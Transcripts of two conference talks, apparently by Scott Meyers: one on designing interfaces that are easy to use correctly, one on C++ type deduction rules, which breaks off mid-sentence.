turns out that the very low-tech approach of documenting an interface before you've implemented the interface has the nice side effect of making the interface better in most cases. Assuming you are working in a strongly typed programming language, something which actually does enforce typing, if that is a reasonable assumption, then it's important to understand that the type system is one of the most powerful tools that you have at your disposal. So by using the type system, you can prevent people from making certain kinds of likely mistakes. So let's suppose I have a date class, and here's a date class. It takes an integer month, an integer day, and an integer year. Now, one of the reasons I chose the date class is because the conventions for expressing dates, at least colloquially, in the United States are different from the way that they're expressed pretty much every place else in the world. So there is sort of the inherent possibility of people expressing a date incorrectly. But there's actually a more general observation I want to make. But the first thing is, so if we take the int month, the int day, and the int year, then if somebody doesn't pay close attention, they might say, well, I'm going to pass it in the day, and then the month in the year, or even the year, and the month in the day, which arguably is the most reasonable way to do things. But the interface can't tell the difference. From the interface point of view, they're all just integers. So it has no way of knowing that the wrong things are being passed in. And there is a more generalized observation here. Any time you have an API, which has two parameters next to one another with the same type, there is the inherent possibility that they can be flipped, and the type system won't be able to tell. So any function taking parameters of the same type that are adjacent to one another, you have just eliminated the possibility of the type system being able to tell you when people pass them in the wrong order. But let's talk about this idea of a date class here. So this date class here, this is an interface that is easy to use incorrectly. People could easily pass in things that they don't pass in the day, month, and year in the proper order. So well, OK, what we can do, assuming we have a strong type system, is we can create a type for day, a type for month, and a type for year. So now there are actually three different types. Well, now that I've got three different types, I can say, OK, here's my date class. You've got to pass in the month first, the day second, and the year third. So now if you do not pass them in the right order, the compiler through strong type checking can ensure that your code does not compile. This means we've just eliminated a whole class of errors. People can't pass these things in the wrong order. So that's a nice improvement. Now, it also means that the code is clearer. So if I say, all right, I want to have a date D with 4, 8, and 2005, somebody reading that code could easily misinterpret, OK, is that April 8th or is that August 4th? It's not quite clear from looking at it. When you spell out the types, it's quite clear exactly what's going on. So that's an improvement. So it's easier to read as well as being harder to make mistakes. I want to point out that the technique of introducing new types for strong type checking only works if you actually are introducing new types. So if you're working in languages with type aliases, where you can create another name for an existing type, c and c++ are the examples that come to mind, if I say, OK, day is a synonym for int, month is a synonym for int, and year is a synonym for int, and then I say, here's my date class, which takes a month, a day, and a year. This is a beautiful looking interface. The problem is, as far as the compiler is concerned, it's date of int, int, int. This is what I call programming to make you feel better about yourself. I mean, it looks beautiful, but the problem is you can now say I'm going to pass in a day, a month, and a year, which is the wrong order here, and the code continues to compile. So if you're going to use the type system, you actually have to use the type system, not the apparent type system. That doesn't do you any good. And if you want to know why my fixation is with April 8, 2005, that's the day we brought our puppy home. That's Darla. Now, Darla is adorable, needless to say. But since we're focusing on interfaces, it's important to recognize, even with what we've talked about so far, there are still ways to make mistakes with this kind of an interface. So what I could do is I could say, OK, I want to have the month m, but the month is minus 4. Now, why would you type minus 4 as a month? Nobody would type minus 4 as a month. However, let's suppose you're supposed to be calculating the month. And instead of saying something like a plus b, you accidentally said a minus b. People have been known to make those kinds of mistakes. So you might accidentally compute the month incorrectly. Now, in this particular case, last I checked, there are only 12 valid months. So if there's only 12 valid months, it doesn't make a lot of sense to me to represent them by probably an integer which could represent 4 billion possible values. When you have a constrained set of values, in many cases, you are better off designing an interface that constrains the values to only the ones that are known to be legitimate. So what we could do is we could say, all right, I've only got 12 month values that make any sense. So what I'm going to do is I'm going to create 12 month objects, give them the appropriate name, and make it so nobody can create any other month objects. So for example, I might say, here's my class month, and then I've got objects for January, February, all the way down through December. In this case here, I am making the constructor for months private, which means nobody can create any other month objects. So I've said, here are the 12 month objects that you're permitted to use, and you can't create anymore, which means that now it's essentially impossible to create invalid months. You've eliminated a whole class of errors. So if I try to say month M minus 4, this won't compile because this is trying to create a brand new month object, and we've made construction illegal for those kinds of things. But I could say, the month is month colon colon April, that'll work. So that's nice. That's an improvement. Well, the problem now is, OK, so I could say, all right, the day D is 71. Well, last I checked, there are not any months with 71 days in them. So it's interesting, though, to think about what we can do about dealing with that problem. I believe it is an extremely useful exercise when looking at any interface to always ask yourself, how could this interface innocently be misused? No one's going to type 71, but again, a formula might yield something which isn't valid. So the question is, how could we prevent these kinds of mistakes? Now, what we could do in this particular case is I could say, well, all right, if I know what year it is, and I know what month it is, I now know how many days there exist in that particular month. So one could imagine an API where you first you create a year object, you go to the year, you then have it give you month objects, and once you've got a month, it will then give you day objects, and then it would be impossible to specify the wrong day, or at least an invalid day. You can specify the wrong day, but you can't specify a day that does not exist. Once you've come up with a possible way to prevent people from making certain kinds of mistakes, then you can say, all right, what is the likelihood of making the mistake, and how serious will it be if somebody makes it? And how much work is it going to be for me to prevent people from making that mistake? Once you have those two pieces of information, you can start doing an engineering judgment for the trade-offs. You can say, all right, this is how likely it is, and this is what it's going to cost me if I do it, and this is how much work it is to prevent people from making that kind of mistake, is it worth it or is it not worth it? I can't tell you the answer to that question, but what I can tell you is that in my experience, most people don't do the analysis in the first place. They simply decide, all right, this is what we're going to implement for an API, and we're not going to worry about the kinds of mistakes that people can make. That's what I just said. Now, constraining values is not always the best way to go. So this happens to be, this is from a couple of years ago, Lonely Planet has changed its website, which will become relevant in a moment. But so this says, all right, so I've specified, as I recall here, so the month has been specified to be June, but notice I can choose June 31st. So this is an example of an interface that makes the interface designer feel like they're really doing a great thing, they're constraining the values. The problem is they're not making it impossible to choose illegal values. So this is an example of an interface that looks like it's constraining values for a reasonable case, but it actually doesn't solve the problem. What would be a better way to solve this problem? Pardon me? Have someone have a calendar widget so you'd only be able to click on the appropriate things in the first place. So this problem can literally be designed out of existence. What struck me when I did this a couple of years ago, so I went to Lonely Planet where if you want to fly, then you go to their flight logger. Now, with the flight, you actually do have a calendar that you choose. And in fact, there's no drop downs. On the other hand, if you wanted to do a hotel, then you had drop downs and you had widgets. But if you wanted to rent a car, you only had drop downs. And the reason I bring this up is because, remember, inconsistency is one of the things that makes an interface easy to use incorrectly and harder to use correctly. So this is an example of them having three different approaches to solving the same basic problem. So this is from about a year and a half ago, I think. I actually checked shortly before I came here. And right now they have a uniform interface. At least they did when I left. But they have right now, I don't know. The last thing I want to mention is to avoid over reliance on string. So if I have an integer in my program, that is almost a meaningless piece of information. That is not a useful type. And int, what does that mean? A street number and age, number of microseconds since, I don't know, January 1, 1970, number of people who attend this conference. And int is almost useless information. String is similar. If you have a type that is a string, that does not help the compiler help you. So for example, if I have a file name, a file name is a completely different kind of thing, for example, from a customer name. And both of those are really different from, for example, a regular expression. If I have different types for things that are conceptually different, that means that the compiler can make sure I only use them in correct ways. I can do much better validity checking on them. I can also format them for printing things out, stuff like that. I dealt with a client one time, and they had to deal with printer names and with printer driver names. They were both file names, so they just had a string which represented the name. And they actually spent a fair amount of really unpleasant debugging time trying to figure out why their program was not working, because they passed in a driver name when they should have passed in a printer name. Because the type system did not realize that these are two completely different kinds of things that are not substitutable to one another. So the summary of what I have to say here is I do believe that the single most important design guideline is to make interfaces easy to use correctly and hard to use incorrectly. And we talked about some specific ways that you can try to implement that basic idea. One of them is to adhere to the principle of least astonishment. And you can do things like avoid gratuitous incompatibilities with things that are in the surrounding environment, choose good names, which are still really hard to choose and still extremely important, and be consistent in whatever choices you make, whether it's for layout or for naming or for concepts behind things so that people can figure out what you're doing. We talked about progressive disclosure, which is a mechanism that discourages people from going into the places that will probably get them in trouble and encourages them to stay in the areas where they're probably going to get the results that they want. We talked about the very simple approach of documenting interfaces before we actually implement them. And then under the assumption you are working with a programming language which has some kind of strong typing, talked about introducing new types to prevent errors. And I emphasize that you have to be types, not type synonyms, so the type system can help you out. Talked about possibly explicitly defining all the values for that type so that people can't create invalid values. And then I concluded by saying you should avoid over reliance on string. If you are interested in more information on any of these kinds of topics, there's some references here on especially interface and API design, some stuff on user interface design, and that's the end of that. So are there any questions? Yes? What type of APIs do you like? What kind of APIs do I like? I like you are looking up to because they are well designed. So the question is to name an API that I like because I think it's really well designed. Unfortunately, most of my time is spent in the world of C++ and I don't know of any APIs in that world that I would really hold up and say this is a great example of API design. I wish I had some. I mean, there are some in that realm that I would say are pretty good, but I wouldn't call them great. So actually, because it's very late in the day, so I'm going to say thank you very much. You can ask a question later. That'd be fine. So thank you very much for coming. And on your way out, please be sure to pick up the little colored pieces of paper and put them in the bin. So thanks very much. Thank you.
At last year’s NDC, Scott Meyers devoted an entire day to guidelines for improving the quality of software, regardless of the application, the language in which it's written, the platform on which it runs, or the users it is intended to serve. This year, by popular demand, Scott isolates the single most important guideline from last year’s talk and focuses on it in this session. The guideline is Make interfaces easy to use correctly and hard to use incorrectly. Scott explains how this applies to both user interfaces and APIs, and, with specific advice and countless examples, shows how to employ it to improve the quality of the many interfaces in your software.
10.5446/50637 (DOI)
I would like to begin with an apology because this is a talk I really wish I did not feel compelled to give. Because really, type deduction, I mean really an entire talk on type deduction. I've been working for the past couple of years on a new book on C++ and when I first sat down to write the book, I did not plan to say anything about type deduction. And what I found was that it was impossible for me to describe many, many topics without assuming type deduction. So I finally reluctantly said, well, okay, I'll add an item on type deduction. Okay, I'll add two items on type deduction. Okay, I'll add a chapter on type deduction, which is now the beginning of the book, which is so sad because I really did not want to talk about that. But this is about C++ type deduction and why you care. So I want to talk a little bit about why you care. Let me start by pointing out that in C++ 98 we had templates, which means we had type deduction. And in my experience, you didn't really need to know the rules, the right thing just happened. And as an example, it's my job to know this stuff. I never bothered to learn how C++ type deduction worked in C++ 98. It worked so naturally and so obviously, I never really had to think about it very much. So I assumed it would be a similar thing when I got to C++ 11. That's not what my experience was. So in C++ 11, there's a lot more context in which type deduction takes place. So it's not just templates any longer. We've got auto variables, we've got universal references, we've got lambda captures, which do type deduction. We've got returns, which do type deduction. We have decal type, which does type deduction. So there's a lot more places where type deduction is taking place. And as a result, it just works not as often. There's actually six different sets of type deduction rules that I have identified. In C++ 14, they didn't introduce any new sets of rules for type deduction, but they did expand the scope where type deduction can take place. So now function return types, lambda and it captures. And as a result, we've got six sets of rules applied in a variety of different ways. It's a lot easier to get confused than it used to be. And recently I've been trying to make sense of this myself. So this is my attempt to describe the landscape of type deduction in C++. And by the way, why do you care? You care because it's going to be very difficult to make sense of how to program in C++ 11 and C++ 14 without knowing what's going on. So in C++ 98, we used to say there's one set of rules. There's template type deduction. But actually, there's two sets of rules within template type deduction. If you have a parameter that is a reference or is a pointer, that uses a different set of rules than if you have a parameter which is taken by value. So there really were two sets of rules in C++ 98. So then C++ 11 decided to add a few more. So it augmented the rules for template type deduction. So now if you have a template parameter, which is what I call a universal reference, it has another set of rules for doing type deduction. But C++ 11 then also decided to give lambda functions have an implicit return. It actually follows the same rules as by value template parameters. So not a new set of rules, but a new way of applying them. It also added decal type, which is a completely different way of deducing types. It then decided to add lambda captures. Now the lambda captures are based on the rules, oddly enough, for reference and pointer is in templates, but they're not the same as them. So you should read this line as just saying, this is based on these rules, but it's not identical to them. It's not supposed to be derivation. It's not a subset. It's not a superset. It's just different, but related. C++ also added the way to declare objects using auto. That actually uses the template type deduction rules, but adds some stuff of its own, which we will see. So it's not the same. In C++ 14, then we have lambda auto parameters, which uses template type deduction rules. We have an auto return type on all functions, which uses template type deduction rules. What I want you to notice is that an auto return type uses template type deduction, which is not the same as an auto object. So you can't even say there's one set of rules for auto. There's multiple sets of rules for auto. There's also decal type auto, which uses the decal type deduction rules. There is a lambda init capture, which actually uses the auto rules. My hope is that within the next hour, I will describe everything here to you except for C++ 11 lambda captures. So that's the most important set of rules that I think you need to know. So that's my current understanding of type deduction and C++. There's six different kinds. So there's three kinds inside template type deduction, and then we've got C++ lambda capture, we've got auto, and we've got decal type. So that should keep us busy for a little while. I'm going to start with stuff that, in theory, you already know. So try not to nod off or check your Facebook page while we're talking about this. So we're going to start with template type deduction since it's, in some sense, the core of the whole business. If I have a function template F, I have a type parameter T. Now, type deduction will be deducing a type for T. But usually we have some kind of a parameter type which also has to be deduced. And we're actually deducing both of those things simultaneously. So if I have some expression, so I pass an expression to this template, given the type of the expression, I want to figure out what is T and what is param type. And I'll be giving a lot of examples so we'll see how this works. There are three general cases for template type deduction. It's not one set of rules, it's three. So either parameter type is a reference or a pointer, but it's not a universal reference, or it is a universal reference, or it's not a reference and it's not a pointer. So let's start with the simplest case, which is we have a function parameter. It's a reference or a pointer, but it's not a universal reference. Now I want to point out here that the rules I'm going to describe, they're very, very intuitive. Nothing here should surprise you. So there's not going to, I hope, be any news here at all. So if I have some function f which takes a reference parameter, tref, so we've got to figure out what is the type for t and what is the type for tref. So if x is an int, if cx is a constant int, and if rx is a reference to a constant int, if I call f of x, the type of x is int, so t is deduced to be int and param is deduced to be intref. So t is, excuse me, t is int and param is intref. This should surprise no one. If I have a constant int and I pass the constant int here, well, then I'm going to have a reference to a constant int, which means the parameter type will be referenced to constant int, which means t will be constant int. So t is constant, the parameter type is referenced to constant int. The only thing that is mildly surprising, and it's not surprising really, is if I have an argument that I pass to the template and the argument is itself a reference. So in this case, rx is a reference to a constant int. To deduce the type, you throw away the reference, so I start with reference to constant, and then if it's a reference, you ignore that. So you throw away the reference, you treat it like a constant. And as a result, when I call f of rx, again, t is deduced to be constant, and this becomes a reference to a constant. It's the same as passing in the constant itself. And what I want you to notice is, in this case here, when I pass in a reference, the type t is never deduced to be a reference. It throws that reference away. This has been true since 1992, maybe 1990. Nothing's changed. If the parameter type is a constant reference to a t, the type that is deduced for t will change, but the parameter type won't. So same situation. X is an int, Cx is a constant, rx is a reference to a constant, just like we had before. So x is an int, so t is deduced to be int, and the parameter type becomes reference to constant int. So t is int, parameter type is reference to constant int. So even though the x is an int, the constant got added here. Again, there is nothing counterintuitive about what I'm showing so far. If I have a reference, excuse me, if I have a constant int, well, then this is already constant, so the type t is just deduced to be int, and this remains reference to constant. So in this case here, t is deduced to be int, and the reason I've written the constant in gray is because on the previous slide, we deduced constant as part of the type. Now because constant is part of the parameter type, we don't deduce t to have constant in it. So the constant is still there, but it's not in the deduced type, it's now in the parameter type. And similarly, when I have f of a reference to a constant, we throw the reference away like we always do so far, and then what we do is we apply the regular rules, so this is a reference to a constant, we throw the reference away, we have a constant, which means we get the same results as we do here. And again, notice that the type t is deduced to be int, not a reference. So the only mildly interesting thing about what we've talked about so far is that if you have a reference and you pass it in, you throw the reference away, that's it. So this should not be surprising in any way. If I have a pointer parameter, it uses basically the same rule, so if x is an int and px is a pointer to a constant int, if I pass in a pointer to an int, then the type t is deduced to be int and param becomes int star, just as you would expect. And if I have a pointer to a constant int and I pass this in, well, then I have a pointer to a constant, which means t is deduced to be constant. There still should not be anything that looks even remotely interesting. This is all obvious. This has all been this way for 20 years, more than 20 years now. When you use auto for purposes of discussion right now, auto uses the same rules as template type deduction, except that the type t, which would be deduced to a template, is represented by auto. So the question is, what is the type deduced for auto? It's going to use the same rules I've just explained to you. So x is still an int, cx is still a constant, rx is still a reference to a constant. That has not changed. Now remember, there's three sets of rules for template type deduction. We are doing the first of those three, which is the type is a reference or a pointer. So auto ref, because it's an auto ref, we treat it as if it is a template type parameter that is a reference type. So in this case here, we're going to get a reference to whatever x is, well, x is an int, so v1's type is int ref, and auto is deduced to be int. V2, this is a reference to whatever cx is. Cx is a constant int, so auto is deduced to be constant, and v2 is a reference to a constant int. Now in this case here, we have an auto reference. Rx is a reference to a constant, so we throw the reference away. That just leaves us with a constant, and we get the same results as we would do for the constant. And if it's a const auto ref, it's exactly the same as when I had a const t ref in the template. So x is of type int, so this will be a reference to a const int, auto's type is deduced to be int, and v4's type is a const int ref. This const arises because it's present here. If I have a reference to a const auto, well, cx is a constant, I'm going to get a reference to a const int, and auto's type is now int. I've grayed out const because the previous slide, we deduced const for the type, but now because const is part of the auto declaration, it's no longer deduced for the type of auto. And it's a similar situation with Rx. This is a reference to a constant, we throw the reference away, proceed as if it's constant. If you are not bored out of your mind at this point, I am not doing my job. This is completely intuitive. There's nothing surprising about what's going on. So basically case number one, which is by reference or by pointer, either parameters or auto variables, everything proceeds the way it's proceeded for the past 20 plus years, it's completely intuitive. There's no surprises. Now where there is a surprise is when you start taking what I call a universal reference. How many people are familiar with the term universal reference? All right. So there is no such thing as a universal reference according to the standard. However, if you have a template function that takes a parameter of type trefref, special rules apply for type deduction. And because special rules apply, I believe it is worthwhile to have a special name for this kind of parameter because it doesn't behave like any other kind of parameter. So a universal reference is simply a trefref parameter in a function template or, as we shall see, an autorefref object. And what makes it special is it's treated just like a normal reference parameter. It is a reference. Except it has one special rule. I'll tell you what the rule is in a minute, but if you read it just flat out, it will make you crazy. So let's see some examples first. How many people are familiar with r values and l values? Okay. There's a number of people who did not raise their hands, and this is going to pretty much assume you are familiar with r values and l values. So very, very quickly. And l value is something that you can typically make an assignment to or you can take its address. Think of normal variables as an l value. There's lots of special cases, but normal variables are l values. You can take their address, you can give them values. That's an l value. And r value, generally speaking, is a temporary object. Think of something returned from a function. Think about the result of a cast. Those would be examples of r values. r values have no name, and you can't take their address. Think of temporary objects. What they're modeled on. The reason we have universal references is that sometimes it is useful to be able to have somebody call a function passing either an r value or an l value and have the information as to whether it is an r value or is an l value captured by the template so it can be propagated to further function calls. That's what makes universal references special. They capture the information about whether what was passed to them was an l value or an r value. It is the only parameter that does that. X is still an int. CX is still a constant. RX is still a reference to a constant. Nothing's changed. When I call f of x, x is a normal value. You can take its address, you can give it values. X is an l value. And here's the special rule. When you pass an l value to a template that takes a universal reference parameter, then you look at the type of the l value. In this case, the type of x is int. So now you've got the type int. And you add an l value reference to it. You add a reference. This is important because remember all the examples I've shown you up until this point, we never deduced a reference as the type of a template argument. The references were always stripped. Now we're adding one. So x is an l value. That means t is deduced to be int ref. So the type t here is actually deduced to be a reference to an int, which means that param becomes an r value reference to an l value reference to an int. And I don't want to spoil the ending, but I must. It turns out that there are rules for dealing with references to references. And the rules are if you have an l value reference, or r value reference, or an r value reference, or an l value reference, if there's an l value reference involved anywhere, the result is an l value reference. I just explain the rules. I don't make them. And so we end up with an r value reference to an l value reference, and the result is that the parameter type is actually int ref. This becomes important if you're trying to read header files. So if you see this, it goes, oh, f, it takes an r value reference to a t. And the answer is maybe it takes an r value reference to a t. Because if an l value is passed in, this parameter type actually becomes an l value reference to a t. And if you came into this room and you're not familiar with l values and r values or universal references, I apologize. It's not going to get much better. Cx. It has a name. You can take its address. You can't assign to it, but you can take its address. Cx is also an l value. As a result, the type that is used for t is, well, the type of Cx is constant. That's its type. See? Constant. But because it's an l value, and we have this special type of parameter, the type that is used for it is constant ref. We therefore end up with an r value reference to an l value reference, which collapses down to an l value reference, which means that the type of param is l value reference to a constant. If I say f of rx, well, this is a reference to a constant. We still throw the reference away. So the reference gets discarded. We're left with a constant. Rx has a name. You can take its address, which means it's an l value. Because it's an l value, we treat it exactly the same way as we did Cx here. So again, t is constant ref. Parameter type is reference to constant. Numeric literals. Like O, say 22. Numeric literals are defined by the language to be r values. That's just the definition. And it makes sense. You can't take the address of the literal 22. The surefire test for l value-ness is whether you can take its address. Almost surefire. Usually fires. So 22 is an r value. Because 22 is an r value, there's actually no special rule. The special rule is only for l values. So this is of type int, which means t is deduced to be int, which means param is an r value reference to an int. So t is int, and parameter type is r value reference to int. You can memorize the rules, but frankly, you're much better off simply thinking about it this way. So let's go up a level of abstraction. What this means is, if I have a function template that takes a universal reference parameter, then if the function is called with an l value, the resulting template instantiation will take an l value reference parameter. And if I call that template with an r value, the resulting function instantiation, excuse me, template instantiation will have an r value reference parameter. I mean, the rules get you there, but that's the high level they're actually trying to achieve. So what this means is I have a single template which can be instantiated twice for every type. So for int, I can get an l value reference instantiation, and I can get an r value reference instantiation depending on what's passed in. This is primarily useful for what's known as perfect forwarding. It's all intertwined with move semantics. But from a type deduction point of view, which is the purpose of this talk, what I want you to remember is special rule for universal references. Any questions about this? Everybody's thinking, should have gone to the talk on Scala. There must have been a talk on Scala. Okay, so now we've talked about two of the kinds of type deduction rules for templates. We talked about deducing types for references and pointers that aren't universal references. Completely intuitive, yawn. We talked about deducing types for universal references, special rule for l values, which leaves bi-value parameters. That's the third kind of template type deduction, bi-value. So with a bi-value parameter, so like this here, with a bi-value parameter, someone's going to pass you something and you're going to make a brand new copy of it. Param is going to be a brand new object. It will be constructed. It'll be a brand new object. This is important. Because it's a brand new object, if somebody initializes it with something that's const, we don't care about what's const because we're going to get our own copy of it and our own copy won't be const. So what's different about pass-by-value is you discard constant volatile qualifiers. How many people are familiar with volatile? That is so sad. I would like all of you to wipe volatile from your minds. No good can come of it. It's especially dangerous if you ever want to have children. Don't even think about volatile. All right. X is still an int, CX is still a constant, RX is still a reference to a const int. This says I want to create a brand new object of type T from an int. So the type that's deduced is int and parameter type is int. This says I have a const int and I want to make a copy of it. Now if I take a constant and I copy it, the copy doesn't need to be const. So it's not. We discard the const nes. So with f of CX, the type that is deduced is just int because we're making our own independent parameter. The original const is not modified. So we are not violating const correctness. Similarly, when I have a reference to a constant, we take that reference and we still throw it away. That has not changed. Now we're left with a constant. And now because it's being passed by value, we throw the const away. Type deduced is int. The parameter type is also int. So with by value parameters, we throw away const and volatile if we happen to have it. So we always throw away references with by value parameters, we throw away consts. That's another set of rules. Auto basically uses the same rules and for purposes of our discussion so far, auto uses exactly the same rules. So in this case here, X is still an int. CX is still a constant. RX is a reference to a constant. They're never going to change. They're going to always be those things in my slides. I hope. So I say v1 auto, this auto here, notice it's not a reference. It's not a pointer. We're going to use the by value type deduction rules. So this auto will deduce int. This auto will deduce int because although this is a constant, we're making a brand new copy so we throw the constness away of the copy. X throws away the reference like we always do, throws away the const because we're making a completely independent copy. In all three cases, the type is int and auto deduces the type of int. Auto is never deduced to be a reference. But if you add a reference to auto, then you go back and use the rules for deducing a type for template parameters, which are references. And if it's an auto ref ref, a universal reference, if it's a universal reference, then you apply the universal reference type deduction rule. So for example, in this case here, v6 is a universal reference. It's being initialized with RX. So RX is a reference to a constant. We thrill, we thrill. We still throw the reference away, leaving us a constant. But RX has a name. You can take its address. It's an L value because it's an L value. The type that is deduced for auto is a reference to a constant, which, because we then have an L value reference and an R value reference together through a process known as reference collapsing, eventually ends up as constant ref. And this is important for reading source code because notice that it says auto ref ref in the source code, which means you might think, oh, I have an R value reference, but you don't. In this case here, the type of v6 is a reference to a constant. It's not an R value reference because it's using the universal reference type deduction rules. OK. Any questions so far? OK. There is a difference between a constant expression and an expression that contains const. They're not the same thing. So here is a function, some func. It takes three parameters. Parameter number one is a constant pointer to a constant int. Parameter number two is a pointer to a constant int, and parameter number three is a pointer to an int. Parameter number one is a constant pointer to a constant int. That is an example of a constant expression. The pointer itself is const. And what it points to is also const. So it contains const, that's what it points to, but the expression itself is also const, the pointer itself is const. On the other hand, param 2 is a non-const expression, it's a regular pointer, that pointer can be assigned, it can be set to null, but it points to something which is const. That is an example of an expression that contains const. I say auto p1 is param 1. Now notice that this is by value, there's no reference here, there's no pointer here, we're going to use the by value rules. Now the by value rules say, first throw away a reference, but param 1 isn't a reference so there's no reference to throw away. And then what it says is, if it's const, throw away the const nest. Well, param 1 is const, so we discard the const nest because we are copying this pointer, which is const, to make a brand new pointer, the brand new pointer isn't const. But both of them point to something which remains const. So p1's type is a pointer to a constant int, which means this const is maintained, but this const is thrown away. This makes sense. If I have a pointer to a constant object and I copy the pointer, the resulting pointer still has to point to something which is const. I have to respect the fact that this pointer said what I point to is const. So if I make a copy of that pointer, it still points to something which is const. But if the pointer itself is const, it can't be set to null, for example. If I copy the pointer, the new pointer could be set to null. Param 2 is not a constant object, but it points to const, so the type of p2 is pointer to constant. And param 3 is a pointer to an int, so it should not surprise you that p3 is a pointer to an int. What I told you earlier is that if you are dealing with a buy value parameter to a template, or equivalently an auto that is not adorned with references or pointers, it's creating a brand new object. Then what I told you is if the expression is a const or a volatile, you ignore that. That's technically accurate. The most common phrasing you will hear from other people or in books or magazines or anything you read on the Internet is that top level constant volatile is ignored. When they say that, what they mean is if the object itself is const or volatile and you copy it into a brand new object, the constness or volatilness of what is being copied is discarded. But if it's a pointer to const, that const is retained. If it's a reference to const, that const is retained. So these are just two different ways of saying the same thing. But it doesn't mean you throw all the consts away. That's not what happens. So if I have exactly the same kind of example, if I now say p2 is a reference to an auto, so this is an auto ref. This means we now follow the reference parameter rules for templates because so far everything in auto uses the same rules as templates. So param1 is a constant pointer to a constant int, so p2 is a reference to a constant pointer to a constant int. Do you only throw away that constness if it's a buy value pass? Have I apologized for having to explain this? It turns out there's a couple of special cases which I'm actually pleased to not have time to go through now. I'll just remark that if you have an array or if you actually have, if you have the name of an array and you pass it to a template and you have a function name and you pass it to a template, there's special rules for dealing with array names and function names, and I'm going to pretend that we don't know that. So that's template type deduction, except for the weird special cases of array names and function names which really are truly edge cases. Any questions at all about anything to do with template type deduction? Did DK in the previous talk? Okay, great. So those of you who were in the talk, you know about DK. Any other questions about template type deduction? All right. So auto type deduction is exactly the same as template type deduction except if a braced initializer is used, you deduce an initializer list type. Those of you who are at my talk this morning have already seen this, so this will be not news to some of you. So if I have a template F which takes a parameter of type T and I call F with brace 123 close brace, this call to the template will not compile. The reason it will not compile is because brace 123 close brace does not have a type. Without a type, there can be no type deduction. But there's a special rule for auto. The special rule for auto, it's actually quite odd the way it's written in the standard. The rule for auto essentially says see that thing over there that has no type, pretend like it does. It doesn't have a type, but let's pretend. So if I say auto brace 123 close brace, the result of this will be X's type is now initializer list of it. That is the only difference between auto type deduction and template type deduction. Yeah. Okay, so essentially the question is why is there a special rule for auto? Okay, we can look at it a couple of different ways. Your question is why can't we deduce a type for it? The answer is I don't know. And if the question is asked a different way, which is okay, well, why does auto have a special rule? In that case, my answer is I don't know. Which I find frustrating because I have been trying to find out for literally two years as to what there's a rule in the standard. This means some human being wrote it down. This means the standardization committee voted to approve this particular rule. Somewhere, someone knows why this rule was added. For all I know, somebody want to bet when they were all really drunk. I don't know. If someone ever finds out, really what the rule was, sorry, if someone ever finds out... I take it you would get an answer in two weeks. It's not really fair because Nico's part of the library, but you know guilt by association. I know who I can ask. Okay, that would be great. Okay, so in order to deduce that this is an initializer list of int, all the types have to be the same. If they are of different types, then type deduction will fail for that too. But to answer your question, which is my question, I have no idea why they did this. So I'm not convinced they do either, but I will be thrilled. Berkeley thrilled. Okay. Now if you start writing non-trivial templates or using non-trivial templates and you're like, okay, wait, sometimes we throw away the reference, but sometimes we add a reference and then maybe we throw away the const, but it's not if it's a const. If it's inside the type as opposed to outside the type, you can go crazy. It would be really nice if we could go, what freaking type is being deduced? It turns out we can do that. And it's really easy and unbelievably useful. What we do is we create a template class TD. TD stands for type display. Notice that I declare the template, but I do not implement it. So this is declaring a template. It's all it does. Now in this particular case, I have a function template and what I'm curious about is every time I call this function template, I would like to know what types are being deduced. So what I'm going to do is I'm going to declare a local variable called T type of type TD of T. Now what's going to happen during compilation is the compiler is going to say, okay, I'm going to instantiate this template for T and then it's going to go, wait a minute, I can't instantiate this class. There is no class to instantiate. It's only been declared. And then in its own charming way, it will go, and in the middle of that will be the type you're looking for. It works better than you think. I mean, everybody who's programmed in C++ has seen horrible template error messages. These are not bad. I have some examples. Similarly, if I want to know what is the type deduced for the parameter, then what I'm going to do is I'm going to say TD of decal type of parameter. And I will have more to say about decal type shortly. But basically what we do is we say, look, compiler, you know what param's type is. So I'm going to use whatever that type is to instantiate TD. So for example, if I have x is 22 and rx is a reference to a constant, and I call f of rx, let me go back one slide. So I'm calling this template. And this template is going to cause this code to be compiled. So this is the template I'm calling. And I pass it rx. Now what I have told you is the type that will be deduced is we'll throw away the reference. And now I've got to go back and see, hello. Notice that I'm passing it's a reference to a T, which means I use the rules for references. So what I've told you is that the resulting type will be, we'll throw away the reference and we'll end up with constant, which means that T will be constant and the parameter type will be reference to constant. That's what I've told you. Why should you believe me? Let's see what the compilers have to say. So this is from GCC 4.8. It says error TD of constant has incomplete type. And then it says error TD of constant ref param type has incomplete type. Well, this tells us exactly what we want to know. This says T type, the parameter, excuse me, T type, the local variable T type is an instantiation of TD of constant, which means the type T was deduced to be constant. And param type, TD tried to instantiate of constant ref, which number one is really easy to read and number two agrees with me and therefore must be correct. What's that? Can I add one thing? Sure. There's a tool called MetaShell, M-E-T-A shell, which is an add-on for the Clang compiler to inspect the interactively and you can program interactively and find out the types of template metaprogramming. Oh, okay, cool. So that's also very helpful. Okay, so the comment is that there is an extension for Clang called MetaShell that permits you to inspect interactively the types that have been deduced during template metaprogramming. So this is Visual Studio 2013. This is the old version of Visual Studio 2013. It was the current version yesterday, but they just released the new version. Even so, T type, T is constant. Param type, T is constant, but notice that it's TD of T ref. So you have to sort of put these two things together. This T is constant, but this is a ref to a T. So again, it gives you the same information as GCC does. And this is from Clang. TD of constant, TD of constant ref. I have found this to be extremely useful in trying to figure out what types the compiler is deducing. Yeah? So the question is, is there any way to get this at runtime? It all depends. Would you like an accurate answer or an easy to get answer? Okay. Well, since you want an easy to get answer, then I recommend that you take an expression and then you call type of, not type of, you, what's it called? You need to get the type info. You do type, you do type ID. Pardon me? Type ID, thank you. Do type ID that gives you a type info object, you can then call the name member function and compilers will therefore print out usually a pretty reasonable representation. It's easy, it's relatively straightforward and it is required under some conditions to give you the wrong answer. I am not kidding. It is required by the standard to produce incorrect information in some cases. Now, if incorrect information suits your purposes, that is one way to do it. If it does not suit your purposes, then you have to play some games and write some stuff by hand. I mean, it's not hard to do. I actually did do some work in that area for a while, but what I ultimately found out was why do I want to compile, link and run a program in order for it to give me information that I could have had delivered to me during compilation? So I believe that it's better, I use this incomplete template declaration instead because it gives me accurate information without me having to do any more work earlier than I get it if I did it at runtime. But to answer your question, it can be done, but don't rely on type ID. All right, so this is the do, where were we? Decal type. Yeah, the last thing I want to talk about is Decal type. It can be interpreted more than that. The last thing I want to talk about is Decal type. There are many rules regarding how Decal type works, but I'm only going to talk about two of them because it's going to cover most of what you'll need to know. First, Decal type of a name is the declared type of the name. Unlike auto, never strips constant volatile, never strips references. So Decal type of a name literally is the declared type of that name. There are no surprises. It spits out the declaration. So if I say int x is 10, well, Decal type of x is int exactly as you would expect. If I say rx is a reference to a constant auto and it's referring to x, well, I've told you before 